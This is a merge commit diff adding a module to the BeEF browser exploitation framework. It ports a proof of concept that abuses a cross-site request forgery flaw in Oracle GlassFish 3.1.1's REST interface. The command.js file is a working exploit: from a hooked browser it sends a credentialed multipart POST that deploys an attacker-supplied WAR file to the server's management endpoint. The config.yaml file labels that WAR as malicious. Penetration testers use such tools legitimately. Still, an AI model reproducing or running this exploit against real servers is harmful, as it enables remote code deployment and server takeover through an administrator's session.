Merge pull request #689 from bmantra/master

fixes #661. Ported @malerish PoC for GlassFish (deploy WAR through XSRF)

modules/exploits/glassfish_war_upload_xsrf/command.js

@@ -0,0 +1,224 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+//   This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
+//   For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
+
+
+beef.execute(function() {
+  var restHost = '<%= @restHost %>';
+  var warName = '<%= @warName %>';
+  var warBase = '<%= @warBase %>';
+	
+  var logUrl = restHost + '/management/domain/applications/application';
+
+  //BEGIN Daniel Guerrero binary Base64-library
+/*
+Copyright (c) 2011, Daniel Guerrero
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+    * Redistributions of source code must retain the above copyright
+      notice, this list of conditions and the following disclaimer.
+    * Redistributions in binary form must reproduce the above copyright
+      notice, this list of conditions and the following disclaimer in the
+      documentation and/or other materials provided with the distribution.
+    * Neither the name of the Daniel Guerrero nor the
+      names of its contributors may be used to endorse or promote products
+      derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY
+DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+/**
+ * Uses the new array typed in javascript to binary base64 encode/decode
+ * at the moment just decodes a binary base64 encoded
+ * into either an ArrayBuffer (decodeArrayBuffer)
+ * or into an Uint8Array (decode)
+ * 
+ * References:
+ * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer
+ * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array
+ */
+
+var Base64Binary = {
+	_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+	/* will return a  Uint8Array type */
+	decodeArrayBuffer: function(input) {
+		var bytes = Math.ceil( (3*input.length) / 4.0);
+		var ab = new ArrayBuffer(bytes);
+		this.decode(input, ab);
+
+		return ab;
+	},
+
+	decode: function(input, arrayBuffer) {
+		//get last chars to see if are valid
+		var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1)); 
+		var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1)); 
+
+		var bytes = Math.ceil( (3*input.length) / 4.0);
+		if (lkey1 == 64) bytes--; //padding chars, so skip
+		if (lkey2 == 64) bytes--; //padding chars, so skip
+
+		var uarray;
+		var chr1, chr2, chr3;
+		var enc1, enc2, enc3, enc4;
+		var i = 0;
+		var j = 0;
+
+		if (arrayBuffer)
+			uarray = new Uint8Array(arrayBuffer);
+		else
+			uarray = new Uint8Array(bytes);
+
+		input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
+
+		for (i=0; i<bytes; i+=3) {	
+			//get the 3 octects in 4 ascii chars
+			enc1 = this._keyStr.indexOf(input.charAt(j++));
+			enc2 = this._keyStr.indexOf(input.charAt(j++));
+			enc3 = this._keyStr.indexOf(input.charAt(j++));
+			enc4 = this._keyStr.indexOf(input.charAt(j++));
+
+			chr1 = (enc1 << 2) | (enc2 >> 4);
+			chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+			chr3 = ((enc3 & 3) << 6) | enc4;
+
+			uarray[i] = chr1;			
+			if (enc3 != 64) uarray[i+1] = chr2;
+			if (enc4 != 64) uarray[i+2] = chr3;
+		}
+
+		return uarray;	
+	}
+}
+  //END Daniel Guerrero binary Base64-library
+
+  if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+    XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+      function byteValue(x) {
+        return x.charCodeAt(0) & 0xff;
+      }
+    var ords = Array.prototype.map.call(datastr, byteValue);
+    var ui8a = new Uint8Array(ords);
+    this.send(ui8a.buffer);
+    }
+  }
+
+  function fileUpload(fileData, fileName) { 
+    boundary = "HELLOWORLD270883142628617", 
+    uri = logUrl, 
+    xhr = new XMLHttpRequest(); 
+ 
+    var additionalFields = { 
+      asyncreplication: "true", 
+      availabilityenabled: "false", 
+      contextroot: "", 
+      createtables: "true", 
+      dbvendorname: "", 
+      deploymentplan: "", 
+      description: "", 
+      dropandcreatetables: "true", 
+      enabled: "true", 
+      force: "false", 
+      generatermistubs: "false", 
+      isredeploy: "false", 
+      keepfailedstubs: "false", 
+      keepreposdir: "false", 
+      keepstate: "true", 
+      lbenabled: "true", 
+      libraries: "", 
+      logReportedErrors: "true", 
+      name: "", 
+      precompilejsp: "false", 
+      properties: "", 
+      property: "", 
+      retrieve: "", 
+      target: "", 
+      type: "", 
+      uniquetablenames: "true", 
+      verify: "false", 
+      virtualservers: "", 
+      __remove_empty_entries__: "true" 
+    }
+
+ 
+    var fileFieldName = "id"; 
+    xhr.open("POST", uri, true); 
+    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
+    xhr.withCredentials = "true"; 
+    xhr.onreadystatechange = function() { 
+      if (xhr.readyState == 4) {
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.'); 
+      } 
+    } 
+      
+    var body = ""; 
+      
+    for (var i in additionalFields) { 
+      if (additionalFields.hasOwnProperty(i)) { 
+        body += addField(i, additionalFields[i], boundary); 
+      } 
+    } 
+  
+    body += addFileField(fileFieldName, fileData, fileName, boundary); 
+    body += "--" + boundary + "--";
+    xhr.setRequestHeader('Content-length', body.length); 
+    xhr.sendAsBinary(body);
+    return true; 
+  } 
+  
+  function addField(name, value, boundary) { 
+    var c = "--" + boundary + "\r\n" 
+    c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n'; 
+    c += value + "\r\n"; 
+    return c; 
+  } 
+  
+  function addFileField(name, value, filename, boundary) { 
+    var c = "--" + boundary + "\r\n" 
+    c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; 
+    c += "Content-Type: application/octet-stream\r\n\r\n";
+
+    for(var i = 0; i< value.length; i++){
+      c+=String.fromCharCode(value[i] & 0xff);
+    }
+
+    c += "\r\n";
+    return c;   
+  } 
+  
+  
+  function start() {
+    fileUpload(Base64Binary.decode(warBase),warName);
+  }
+
+  start(); 
+
+});
+

modules/exploits/glassfish_war_upload_xsrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        glassfish_war_upload_xsrf:
+            enable: true
+            category: "Exploits"
+            name: "GlassFish WAR Upload XSRF"
+            description: "This module attempts to deploy a malicious war file on an Oracle GlassFish Server 3.1.1 (build 12).  It makes advantage of a CSRF bug in the REST interface.<br />For more information refer to <a href='http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html'>http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html</a>."
+            authors: ["Bart Leppens"]
+            target:
+                working: ["FF","S","C"]